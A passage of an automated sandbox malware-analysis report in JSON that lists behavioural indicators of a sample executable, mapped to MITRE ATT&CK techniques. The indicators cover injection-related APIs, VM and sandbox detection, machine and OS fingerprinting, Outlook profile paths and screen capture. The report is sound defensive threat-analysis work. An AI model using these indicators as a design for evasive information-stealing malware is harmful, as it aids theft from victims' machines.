00000000-00001188.00000001.298674.002F0000.00000004.mdmp, 00000000-00001188.00000001.298674.00400000.00000040.mdmp, 00000000-00001188.00000002.300597.002F0000.00000004.mdmp, 00000000-00001188.00000002.300597.00400000.00000040.mdmp\")\n Found reference to API \"PostMessageA\" (Indicator: \"postmessage\"; Source: \"00000000-00001188.00000000.296751.002F0000.00000004.mdmp, 00000000-00001188.00000000.296751.00400000.00000040.mdmp, 00000000-00001188.00000001.298674.002F0000.00000004.mdmp, 00000000-00001188.00000001.298674.00400000.00000040.mdmp, 00000000-00001188.00000002.300597.002F0000.00000004.mdmp, 00000000-00001188.00000002.300597.00400000.00000040.mdmp\")\n Found reference to API \"SendMessageA\" (Indicator: \"sendmessage\"; Source: \"00000000-00001188.00000000.296751.002F0000.00000004.mdmp, 00000000-00001188.00000000.296751.00400000.00000040.mdmp, 00000000-00001188.00000001.298674.002F0000.00000004.mdmp, 00000000-00001188.00000001.298674.00400000.00000040.mdmp, 00000000-00001188.00000002.300597.002F0000.00000004.mdmp, 00000000-00001188.00000002.300597.00400000.00000040.mdmp\")\n Found reference to API \"PostMessageW\" (Indicator: \"postmessage\"; Source: \"00000000-00001188.00000000.296751.002F0000.00000004.mdmp, 00000000-00001188.00000000.296751.00400000.00000040.mdmp, 00000000-00001188.00000001.298674.002F0000.00000004.mdmp, 00000000-00001188.00000001.298674.00400000.00000040.mdmp, 00000000-00001188.00000002.300597.002F0000.00000004.mdmp, 00000000-00001188.00000002.300597.00400000.00000040.mdmp\")\n Found reference to API \"EnumWindows\" (Indicator: \"enumwindows\"; Source: \"00000000-00001188.00000000.296751.002F0000.00000004.mdmp, 00000000-00001188.00000000.296751.00400000.00000040.mdmp, 00000000-00001188.00000001.298674.002F0000.00000004.mdmp, 00000000-00001188.00000001.298674.00400000.00000040.mdmp, 00000000-00001188.00000002.300597.002F0000.00000004.mdmp, 00000000-00001188.00000002.300597.00400000.00000040.mdmp\")\n Found reference to API \"WPUPostMessage\" (Indicator: \"postmessage\"; Source: \"00000000-00001188.00000000.296751.10000000.00000040.mdmp\")", "origin": "File/Memory", "attck_id": "T1055.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/015"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-124", "type": 6, "relevance": 3, "name": "Calls an API typically used to get product type", "description": "\"3bb3c2ed190cece40387a4f95b14e384d6cc46e77c6f75a22bd64a6d87bfffef.exe\" called \"RtlGetNtProductType\" (UID: 00000000-00001188)\n \"3bb3c2ed190cece40387a4f95b14e384d6cc46e77c6f75a22bd64a6d87bfffef.exe\" called \"RtlGetNtProductType\" with parameter 01000000 (UID: 00000000-00001188)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "registry-1", "type": 3, "relevance": 5, "name": "Reads the cryptographic machine GUID", "description": "\"3bb3c2ed190cece40387a4f95b14e384d6cc46e77c6f75a22bd64a6d87bfffef.exe\" (Path: \"HKLM\\SOFTWARE\\MICROSOFT\\CRYPTOGRAPHY\"; Key: \"MACHINEGUID\")", "origin": "Registry Access", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "string-450", "type": 2, "relevance": 1, "name": "Contains ability to determine if process is running under WOW64 (API string)", "description": "Found reference to API \"IsWow64Process\" (Indicator: \"IsWow64Process\"; Source: \"00000000-00001188.00000000.296751.002F0000.00000004.mdmp, 00000000-00001188.00000000.296751.00400000.00000040.mdmp, 00000000-00001188.00000001.298674.002F0000.00000004.mdmp, 00000000-00001188.00000001.298674.00400000.00000040.mdmp, 00000000-00001188.00000002.300597.002F0000.00000004.mdmp, 00000000-00001188.00000002.300597.00400000.00000040.mdmp\")", "origin": "File/Memory", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "string-666", "type": 2, "relevance": 1, "name": "Able to identify sandbox environment running process", "description": "Found string \"vmtoolsd.exe\" (Indicator: \"vmtoolsd.exe\"; Source: \"00000000-00001188.00000001.298674.03150000.00000004.mdmp, 00000000-00001188.00000001.298674.034B0000.00000004.mdmp, 00000000-00001188.00000002.300597.03150000.00000004.mdmp\")\n Found string \"vmtoolsd.exe\"\" (Indicator: \"vmtoolsd.exe\"; Source: \"00000000-00001188.00000001.298674.034B0000.00000004.mdmp\"), Found string \"VGAuthService.exe\" (Indicator: \"VGAuthService.exe\"; Source: \"00000000-00001188.00000001.298674.034B0000.00000004.mdmp\")", "origin": "File/Memory", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-222", "type": 6, "relevance": 2, "name": "Calls an API typically used to retrieve OS information", "description": "\"3bb3c2ed190cece40387a4f95b14e384d6cc46e77c6f75a22bd64a6d87bfffef.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b2031000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00001188)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-144", "type": 6, "relevance": 3, "name": "Calls an API typically used to open an existing named mutex object", "description": "\"3bb3c2ed190cece40387a4f95b14e384d6cc46e77c6f75a22bd64a6d87bfffef.exe\" called \"OpenMutexW\" (UID: 00000000-00001188)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "registry-78", "type": 3, "relevance": 1, "name": "Contains ability to read software policies", "description": "\"3bb3c2ed190cece40387a4f95b14e384d6cc46e77c6f75a22bd64a6d87bfffef.exe\" (Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\SAFER\\CODEIDENTIFIERS\"; Key: \"TRANSPARENTENABLED\")", "origin": "Registry Access", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "registry-174", "type": 3, "relevance": 1, "name": "Tries to retrieve device driver information", "description": "\"3bb3c2ed190cece40387a4f95b14e384d6cc46e77c6f75a22bd64a6d87bfffef.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CURRENTCONTROLSET\\SERVICES\\SANDBOXFLTR\\INSTANCES\"; Key: \"\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1652", "attck_id_wiki": "https://attack.mitre.org/techniques/T1652"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "stream-87", "type": 1, "relevance": 3, "name": "Contains ability to detect virtual environment (API)", "description": "GetTickCount@KERNEL32.dll at 35550-1-00401698", "origin": "Hybrid Analysis Technology", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "string-365", "type": 2, "relevance": 1, "name": "Contains ability to perform scheduled transfer (API string)", "description": "Found reference to API \"GetLocalTime\" (Indicator: \"GetLocalTime\"; Source: \"00000000-00001188.00000000.296751.002F0000.00000004.mdmp, 00000000-00001188.00000000.296751.00400000.00000040.mdmp, 00000000-00001188.00000001.298674.002F0000.00000004.mdmp, 00000000-00001188.00000001.298674.00400000.00000040.mdmp, 00000000-00001188.00000002.300597.002F0000.00000004.mdmp, 00000000-00001188.00000002.300597.00400000.00000040.mdmp\")\n Found reference to API \"GetSystemTime\" (Indicator: \"GetSystemTime\"; Source: \"00000000-00001188.00000000.296751.002F0000.00000004.mdmp, 00000000-00001188.00000000.296751.00400000.00000040.mdmp, 00000000-00001188.00000001.298674.002F0000.00000004.mdmp, 00000000-00001188.00000001.298674.00400000.00000040.mdmp, 00000000-00001188.00000002.300597.002F0000.00000004.mdmp, 00000000-00001188.00000002.300597.00400000.00000040.mdmp\")", "origin": "File/Memory", "attck_id": "T1029", "attck_id_wiki": "https://attack.mitre.org/techniques/T1029"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "string-89", "type": 2, "relevance": 1, "name": "Contains ability to retrieve information about the current system (API string)", "description": "Found reference to API \"NtQuerySystemInformation\" (Indicator: \"QuerySystemInformation\"; Source: \"00000000-00001188.00000000.296751.002F0000.00000004.mdmp, 00000000-00001188.00000000.296751.00400000.00000040.mdmp, 00000000-00001188.00000000.296751.10000000.00000040.mdmp, 00000000-00001188.00000001.298674.002F0000.00000004.mdmp, 00000000-00001188.00000001.298674.00400000.00000040.mdmp, 00000000-00001188.00000002.300597.002F0000.00000004.mdmp, 00000000-00001188.00000002.300597.00400000.00000040.mdmp\")\n Found reference to API \"RtlNtStatusToDosError\" (Indicator: \"RtlNtStatusToDosError\"; Source: \"00000000-00001188.00000000.296751.002F0000.00000004.mdmp, 00000000-00001188.00000000.296751.00400000.00000040.mdmp, 00000000-00001188.00000001.298674.002F0000.00000004.mdmp, 00000000-00001188.00000001.298674.00400000.00000040.mdmp, 00000000-00001188.00000002.300597.002F0000.00000004.mdmp, 00000000-00001188.00000002.300597.00400000.00000040.mdmp\")\n Found reference to API \"ExpandEnvironmentStringsA\" (Indicator: \"ExpandEnvironmentStrings\"; Source: \"00000000-00001188.00000000.296751.002F0000.00000004.mdmp, 00000000-00001188.00000000.296751.00400000.00000040.mdmp, 00000000-00001188.00000001.298674.002F0000.00000004.mdmp, 00000000-00001188.00000001.298674.00400000.00000040.mdmp, 00000000-00001188.00000002.300597.002F0000.00000004.mdmp, 00000000-00001188.00000002.300597.00400000.00000040.mdmp\")\n Found reference to API \"ExpandEnvironmentStringsW\" (Indicator: \"ExpandEnvironmentStrings\"; Source: \"00000000-00001188.00000000.296751.002F0000.00000004.mdmp, 00000000-00001188.00000000.296751.00400000.00000040.mdmp, 00000000-00001188.00000000.296751.10000000.00000040.mdmp, 00000000-00001188.00000001.298674.002F0000.00000004.mdmp, 00000000-00001188.00000001.298674.00400000.00000040.mdmp, 00000000-00001188.00000002.300597.002F0000.00000004.mdmp, 00000000-00001188.00000002.300597.00400000.00000040.mdmp\")\n Found reference to API \"GetNativeSystemInfo\" (Indicator: \"GetNativeSystemInfo\"; Source: \"00000000-00001188.00000000.296751.002F0000.00000004.mdmp, 00000000-00001188.00000000.296751.00400000.00000040.mdmp, 00000000-00001188.00000001.298674.002F0000.00000004.mdmp, 00000000-00001188.00000001.298674.00400000.00000040.mdmp, 00000000-00001188.00000002.300597.002F0000.00000004.mdmp, 00000000-00001188.00000002.300597.00400000.00000040.mdmp\")", "origin": "File/Memory", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "string-413", "type": 2, "relevance": 1, "name": "Contains ability to find open windows (API string)", "description": "Found reference to API \"FindWindowA\" (Indicator: \"FindWindowA\"; Source: \"00000000-00001188.00000000.296751.002F0000.00000004.mdmp, 00000000-00001188.00000000.296751.00400000.00000040.mdmp, 00000000-00001188.00000001.298674.002F0000.00000004.mdmp, 00000000-00001188.00000001.298674.00400000.00000040.mdmp, 00000000-00001188.00000002.300597.002F0000.00000004.mdmp, 00000000-00001188.00000002.300597.00400000.00000040.mdmp\")", "origin": "File/Memory", "attck_id": "T1010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1010"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-146", "type": 6, "relevance": 3, "name": "Calls an API typically used to determine if process is running under WOW64", "description": "\"3bb3c2ed190cece40387a4f95b14e384d6cc46e77c6f75a22bd64a6d87bfffef.exe\" called \"IsWow64Process\" with parameter \"1188\" - (UID: 00000000-00001188)\n \"3bb3c2ed190cece40387a4f95b14e384d6cc46e77c6f75a22bd64a6d87bfffef.exe\" called \"IsWow64Process\" (UID: 00000000-00001188)", "origin": "API Call", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-125", "type": 6, "relevance": 3, "name": "Calls an API typically used to get system version information", "description": "\"3bb3c2ed190cece40387a4f95b14e384d6cc46e77c6f75a22bd64a6d87bfffef.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00001188)\n \"3bb3c2ed190cece40387a4f95b14e384d6cc46e77c6f75a22bd64a6d87bfffef.exe\" called \"RtlGetVersion\" (UID: 00000000-00001188)\n \"3bb3c2ed190cece40387a4f95b14e384d6cc46e77c6f75a22bd64a6d87bfffef.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000300000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000d745000000000000000000010000000000000000180001011cfab501b38a486ca8fbb50195e1cd77421c4e00feffffffe063d1771664d17700000000f0443900010000008aa27d76f0443900e844390030fbb501f4c57d7600002f0000000000f044390044fbb501f223496c00002f0000000000f044390054fbb5017cdc486cf0443900 (UID: 00000000-00001188)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "registry-35", "type": 3, "relevance": 5, "name": "Reads the active computer name", "description": "\"3bb3c2ed190cece40387a4f95b14e384d6cc46e77c6f75a22bd64a6d87bfffef.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\COMPUTERNAME\\ACTIVECOMPUTERNAME\"; Key: \"COMPUTERNAME\")", "origin": "Registry Access", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "string-129", "type": 2, "relevance": 1, "name": "Found mail information locations related strings", "description": "\"Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\" in Source: 00000000-00001188.00000000.296751.002F0000.00000004.mdmp\n 00000000-00001188.00000000.296751.00400000.00000040.mdmp\n 00000000-00001188.00000001.298674.002F0000.00000004.mdmp\n 00000000-00001188.00000001.298674.00400000.00000040.mdmp\n 00000000-00001188.00000002.300597.002F0000.00000004.mdmp\n 00000000-00001188.00000002.300597.00400000.00000040.mdmp\n \"Software\\Microsoft\\Office\\15.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\" in Source: 00000000-00001188.00000000.296751.002F0000.00000004.mdmp\n 00000000-00001188.00000000.296751.00400000.00000040.mdmp\n 00000000-00001188.00000001.298674.002F0000.00000004.mdmp\n 00000000-00001188.00000001.298674.00400000.00000040.mdmp\n 00000000-00001188.00000002.300597.002F0000.00000004.mdmp\n 00000000-00001188.00000002.300597.00400000.00000040.mdmp\n \"Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\" in Source: 00000000-00001188.00000000.296751.002F0000.00000004.mdmp\n 00000000-00001188.00000000.296751.00400000.00000040.mdmp\n 00000000-00001188.00000001.298674.002F0000.00000004.mdmp\n 00000000-00001188.00000001.298674.00400000.00000040.mdmp\n 00000000-00001188.00000002.300597.002F0000.00000004.mdmp\n 00000000-00001188.00000002.300597.00400000.00000040.mdmp", "origin": "File/Memory", "attck_id": "T1114", "attck_id_wiki": "https://attack.mitre.org/techniques/T1114"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "string-78", "type": 2, "relevance": 1, "name": "Contains ability to capture screen (API string)", "description": "Found reference to API \"Failed to GetDIBits: error = %d\" (Indicator: \"GetDIBits\"; Source: \"00000000-00001188.00000000.296751.002F0000.00000004.mdmp, 00000000-00001188.00000000.296751.00400000.00000040.mdmp, 00000000-00001188.00000001.298674.002F0000.00000004.mdmp, 00000000-00001188.00000001.298674.00400000.00000040.mdmp, 00000000-00001188.00000002.300597.002F0000.00000004.mdmp, 00000000-00001188.00000002.300597.00400000.00000040.mdmp\")\n Found reference to API \"BitBlt() failed, error: %d\" (Indicator: \"BitBlt\"; Source: \"00000000-00001188.00000000.296751.002F0000.00000004.mdmp, 00000000-00001188.00000000.296751.00400000.00000040.mdmp, 00000000-00001188.00000001.298674.002F0000.00000004.mdmp, 00000000-00001188.00000001.298674.00400000.00000040.mdmp, 00000000-00001188.00000002.300597.002F0000.00000004.mdmp, 00000000-00001188.00000002.300597.00400000.00000040.mdmp\")\n Found reference to API \"GetDesktopWindow\" (Indicator: \"GetDesktopWindow\"; Source: \"00000000-00001188.00000000.296751.002F0000.00000004.mdmp, 00000000-00001188.00000000.296751.00400000.00000040.mdmp, 00000000-00001188.00000001.298674.002F0000.00000004.mdmp, 00000000-00001188.00000001.298674.00400000.00000040.mdmp, 00000000-00001188.00000002.300597.002F0000.00000004.mdmp, 00000000-00001188.00000002.300597.00400000.00000040.mdmp\")\n Found reference to API \"GetDC\" (Indicator: \"GetDC\"; Source: \"00000000-00001188.00000000.296751.002F0000.00000004.mdmp, 00000000-00001188.00000000.296751.00400000.00000040.mdmp, 00000000-00001188.00000001.298674.002F0000.00000004.mdmp, 00000000-00001188.00000001.298674.00400000.00000040.mdmp, 00000000-00001188.00000002.300597.002F0000.00000004.mdmp, 00000000-00001188.00000002.300597.00400000.00000040.mdmp\")\n Found reference to API \"GetDIBits\" (Indicator: \"GetDIBits\"; Source: \"00000000-00001188.00000000.296751.002F0000.00000004.mdmp, 00000000-00001188.00000000.296751.00400000.00000040.mdmp, 00000000-00001188.00000001.298674.002F0000.00000004.mdmp, 00000000-00001188.00000001.298674.00400000.00000040.mdmp, 00000000-00001188.00000002.300597.002F0000.00000004.mdmp, 00000000-00001188.00000002.300597.00400000.00000040.mdmp\")\n Found reference to API \"CreateDCW\" (Indicator: \"CreateDC\"; Source: \"00000000-00001188.00000000.296751.002F0000.00000004.mdmp, 00000000-00001188.00000000.296751.00400000.00000040.mdmp, 00000000-00001188.00000001.298674.002F0000.00000004.mdmp, 00000000-00001188.00000001.298674.00400000.00000040.mdmp, 00000000-00001188.00000002.300597.002F0000.00000004.mdmp, 00000000-00001188.00000002.300597.00400000.00000040.mdmp\")\n Found reference to API \"CreateCompatibleBitmap\" (Indicator: \"CreateCompatibleBitmap\"; Source: \"00000000-00001188.00000000.296751.002F0000.00000004.mdmp, 00000000-00001188.00000000.296751.00400000.00000040.mdmp, 00000000-00001188.00000001.298674.002F0000.00000004.mdmp, 00000000-00001188.00000001.298674.00400000.00000040.mdmp, 00000000-00001188.00000002.300597.002F0000.00000004.mdmp, 00000000-00001188.00000002.300597.00400000.00000040.mdmp\")\n Found reference to API \"CreateCompatibleDC\" (Indicator: \"CreateCompatibleDC\"; Source: \"00000000-00001188.00000000.296751.002F0000.00000004.mdmp, 00000000-00001188.00000000.296751.00400000.00000040.mdmp, 00000000-00001188.00000001.298674.002F0000.00000004.mdmp, 00000000-00001188.00000001.298674.00400000.00000040.mdmp, 00000000-00001188.00000002.300597.002F0000.00000004.mdmp, 00000000-00001188.00000002.300597.00400000.00000040.mdmp\")\n Found reference to API \"BitBlt\" (Indicator: \"BitBlt\"; Source: \"00000000-00001188.00000000.296751.002F0000.00000004.mdmp, 00000000-00001188.00000000.296751.00400000.00000040.mdmp, 00000000-00001188.00000001.298674.002F0000.00000004.mdmp, 00000000-00001188.00000001.298674.00400000.00000040.mdmp, 00000000-00001188.00000002.300597.002F0000.00000004.mdmp, 00000000-00001188.00000002.300597.00400000.00000040.mdmp\")", "origin": "File/Memory", "attck_id": "T1113", "attck_id_wiki": "https://attack.mitre.org/techniques/T1113"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "string-207", "type": 2, "relevance": 1, "name": "Contains ability to retrieve file and directory information (API string)", "description": "Found reference to API \"GetFileAttributesA\" (Indicator: \"GetFileAttributes\"; Source: \"00000000-00001188.00000000.296751.002F0000.00000004.mdmp, 00000000-00001188.00000000.296751.00400000.00000040.mdmp, 00000000-00001188.00000001.298674.002F0000.00000004.mdmp, 00000000-00001188.00000001.298674.00400000.00000040.mdmp, 00000000-00001188.00000002.300597.002F0000.00000004.mdmp, 00000000-00001188.00000002.300597.00400000.00000040.mdmp\")\n Found reference to API \"GetFileSize\" (Indicator: \"GetFileSize\"; Source: \"00000000-00001188.00000000.296751.002F0000.00000004.mdmp, 00000000-00001188.00000000.296751.00400000.00000040.mdmp, 00000000-00001188.00000001.298674.002F0000.00000004.mdmp, 00000000-00001188.00000001.298674.00400000.00000040.mdmp, 00000000-00001188.00000002.300597.002F0000.00000004.mdmp, 00000000-00001188.00000002.300597.00400000.00000040.mdmp\")\n Found reference to API \"GetCurrentDirectoryA\" (Indicator: \"GetCurrentDirectory\"; Source: \"00000000-00001188.00000000.296751.002F0000.00000004.mdmp, 00000000-00001188.00000000.296751.00400000.00000040.mdmp, 00000000-00001188.00000001.298674.002F0000.00000004.mdmp, 00000000-00001188.00000001.298674.00400000.00000040.mdmp, 00000000-00001188.00000002.300597.002F0000.00000004.mdmp, 00000000-00001188.00000002.300597.00400000.00000040.mdmp\")\n Found reference to API \"GetCurrentDirectoryW\" (Indicator: \"GetCurrentDirectory\"; Source: \"00000000-00001188.00000000.296751.002F0000.00000004.mdmp, 00000000-00001188.00000000.296751.00400000.00000040.mdmp, 00000000-00001188.00000001.298674.002F0000.00000004.mdmp, 00000000-00001188.00000001.298674.00400000.00000040.mdmp, 00000000-00001188.00000002.300597.002F0000.00000004.mdmp, 00000000-00001188.00000002.300597.00400000.00000040.mdmp\")", "origin": "File/Memory", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "string-534", "type": 2, "name": "Contains ability to read files (API string)", "description": "Found reference to API \"ReadFile\" (Indicator: \"ReadFile\"; Source: \"00000000-00001188.00000000.296751.002F0000.00000004.mdmp, 00000000-00001188.00000000.296751.00400000.00000040.mdmp, 00000000-00001188.00000001.298674.002F0000.00000004.mdmp, 00000000-00001188.00000001.298674.00400000.00000040.mdmp, 00000000-00001188.00000002.300597.002F0000.00000004.mdmp, 00000000-00001188.00000002.300597.00400000.00000040.mdmp\")", "origin": "File/Memory", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "string-57", "type": 2, "relevance": 3, "name": "Contains CRYPTO related strings", "description": "Found string \"Content-Transfer-Encoding: base64\" (Indicator: \"base64\"; Source: \"00000000-00001188.00000000.296751.002F0000.00000004.mdmp, 00000000-00001188.00000000.296751.00400000.00000040.mdmp, 00000000-00001188.00000001.298674.002F0000.00000004.mdmp, 00000000-00001188.00000001.298674.00400000.00000040.mdmp, 00000000-00001188.00000002.300597.002F0000.00000004.mdmp, 00000000-00001188.00000002.300597.00400000.00000040.mdmp\")\n Found string \"Microsoft Enhanced RSA and AES Cryptographic Provider\" (Indicator: \"aes\"; Source: \"00000000-00001188.00000000.296751.002F0000.00000004.mdmp, 00000000-00001188.00000000.296751.00400000.00000040.mdmp, 00000000-00001188.00000001.298674.002F0000.00000004.mdmp, 00000000-00001188.00000001.298674.00400000.00000040.mdmp, 00000000-00001188.00000002.300597.002F0000.00000004.mdmp, 00000000-00001188.00000002.300597.00400000.00000040.mdmp\")\n Found string \"Microsoft Enhanced DSS and Diffie-Hellman Cryptographic Provider\" (Indicator: \"diffie-hellman\"; Source: \"00000000-00001188.00000000.296751.002F0000.00000004.mdmp, 00000000-00001188.00000000.296751.00400000.00000040.mdmp, 00000000-00001188.00000001.298674.002F0000.00000004.mdmp, 00000000-00001188.00000001.298674.00400000.00000040.mdmp, 00000000-00001188.00000002.300597.002F0000.00000004.mdmp, 00000000-00001188.00000002.300597.00400000.00000040.mdmp\")\n Found string \"P~AeS\" (Indicator: \"aes\"; Source: \"00000000-00001188.00000000.296751.002F0000.00000004.mdmp, 00000000-00001188.00000000.296751.00400000.00000040.mdmp, 00000000-00001188.00000001.298674.002F0000.00000004.mdmp, 00000000-00001188.00000001.298674.00400000.00000040.mdmp, 00000000-00001188.00000002.300597.002F0000.00000004.mdmp, 00000000-00001188.00000002.300597.00400000.00000040.mdmp\")\n Found string \"PQAeS~\" (Indicator: \"aes\"; Source: \"00000000-00001188.00000000.296751.002F0000.00000004.mdmp, 00000000-00001188.00000000.296751.00400000.00000040.mdmp, 00000000-00001188.00000001.298674.002F0000.00000004.mdmp, 00000000-00001188.00000001.298674.00400000.00000040.mdmp, 00000000-00001188.00000002.300597.002F0000.00000004.mdmp, 00000000-00001188.00000002.300597.00400000.00000040.mdmp\")\n Found string \"8$4,6-9'$6.:*?#1pHhX~AeSlZrNbS\" (Indicator: \"aes\"; Source: \"00000000-00001188.00000000.296751.002F0000.00000004.mdmp, 00000000-00001188.00000000.296751.00400000.00000040.mdmp, 00000000-00001188.00000001.298674.002F0000.00000004.mdmp, 00000000-00001188.00000001.298674.00400000.00000040.mdmp, 00000000-00001188.00000002.300597.002F0000.00000004.mdmp, 00000000-00001188.00000002.300597.00400000.00000040.mdmp\")\n Found string \"$4,8-9'66.:$?#1*HhXpAeS~ZrNlS\" (Indicator: \"aes\"; Source: \"00000000-00001188.00000000.296751.002F0000.00000004.mdmp, 00000000-00001188.00000000.296751.00400000.00000040.mdmp, 00000000-00001188.00000001.298674.002F0000.00000004.mdmp, 00000000-00001188.00000001.298674.00400000.00000040.mdmp, 00000000-00001188.00000002.300597.002F0000.00000004.mdmp, 00000000-00001188.00000002.300597.00400000.00000040.mdmp\")\n Found string \"r augustusCaesar HbU2lieSAsLxM3PQxHqNHwwt4KY jaTR6IFq2D3MewLFGnfgCvWCJVI 2025-02-20 06:25:42 <IPv4> 443 0\" (Indicator: \"aes\"; Source: \"00000000-00001188.00000001.298674.00C30000.00000004.mdmp, 00000000-00001188.00000002.300597.00C30000.00000004.mdmp\")\n Found string \"r Quetzalcoatl DPSGlvAESCxEXYdb43aljj1mBJc iQogYVDWR9+tj2wd3ClRBIOoaC8 2025-02-20 03:19:46 <IPv4> 7430 0\" (Indicator: \"aes\"; Source: \"00000000-00001188.00000001.298674.00C30000.00000004.mdmp, 00000000-00001188.00000002.300597.00C30000.00000004.mdmp\")\n Found string \"r prsv D9znTtsEcVBDWlXIJrlw0Y7SAes Xe5Q9HquW6Itkp2eN3rZyeyf9KA 2025-02-19 23:31:17 <IPv4> 9000 0\" (Indicator: \"aes\"; Source: \"00000000-00001188.00000001.298674.00C30000.00000004.mdmp, 00000000-00001188.00000002.300597.00C30000.00000004.mdmp\")\n Found string \"r ForPrivacyNET cAZWVw33PE/EBZ/vL33giych5Ak XJogewq9Iha3UAEsqN+z7RvmR3U 2025-02-20 03:30:34 <IPv4> 10048 0\" (Indicator: \"aes\"; Source: \"00000000-00001188.00000001.298674.00C30000.00000004.mdmp, 00000000-00001188.00000002.300597.00C30000.00000004.mdmp\")\n Found string \"r Unnamed kRJs6l4yAAKQQNpzvs2tKpKm1TQ rssGShFShi3E/4DP/S32YPKKaEs 2025-02-20 03:29:36 <IPv4> 44989 0\" (Indicator: \"aes\"; Source: \"00000000-00001188.00000001.298674.00C30000.00000004.mdmp, 00000000-00001188.00000002.300597.00C30000.00000004.mdmp\")\n Found string \"r Unnamed MZRM+Uj2p/2yZ7Y5c0hh/u7i4DM ZAFUbv2e6rdMOB9naesPUZtFROE 2025-02-20 05:13:53 <IPv4> 443 0\" (Indicator: \"aes\"; Source: \"00000000-00001188.00000001.298674.00C30000.00000004.mdmp, 00000000-00001188.00000002.300597.00C30000.00000004.mdmp\")\n Found string \"r Waeswynn K8oKi1dZ29dkv5+l0bOu6ddNK2g 9OrDQgwA7ODugkXGKJ86rgejhFk 2025-02-20 02:46:59 <IPv4> 443 0\" (Indicator: \"aes\"; Source: \"00000000-00001188.00000001.298674.00C30000.00000004.mdmp, 00000000-00001188.00000002.300597.00C30000.00000004.mdmp\")\n Found string \"r moraescabecadepinto T/h/Ai7d/XulUbY9TunNgwTuvCY vksTIVg91JBo1JS9bmGUzLgBJPo 2025-02-19 22:51:52 <IPv4> 9001 0\" (Indicator: \"aes\"; Source: \"00000000-00001188.00000001.298674.03150000.00000004.mdmp, 00000000-00001188.00000002.300597.03150000.00000004.mdmp\")\n Found string \"r ForPrivacyNET UMNZd+PoLAESm7IstqsNZ0dz1YQ gGKaYUFNScpdDUIeTBKRhBq1eAA 2025-02-19 23:11:57 <IPv4> 8443 0\" (Indicator: \"aes\"; Source: \"00000000-00001188.00000001.298674.03150000.00000004.mdmp, 00000000-00001188.00000002.300597.03150000.00000004.mdmp\")\n Found string \"r fuzzy V02myzue36c1WBuHTwrKWAY6OHY JVRmtAESUheAlt+ZLJX2Ab2tVtI 2025-02-20 13:25:00 <IPv4> 12938 0\" (Indicator: \"aes\"; Source: \"00000000-00001188.00000001.298674.03150000.00000004.mdmp, 00000000-00001188.00000002.300597.03150000.00000004.mdmp\")\n Found string \"r tokki YsPiPJVRGovMnCKSTgNrPnJitUE bUrqnuF25Ku0OLfGjQRR0aeSZmI 2025-02-20 11:15:07 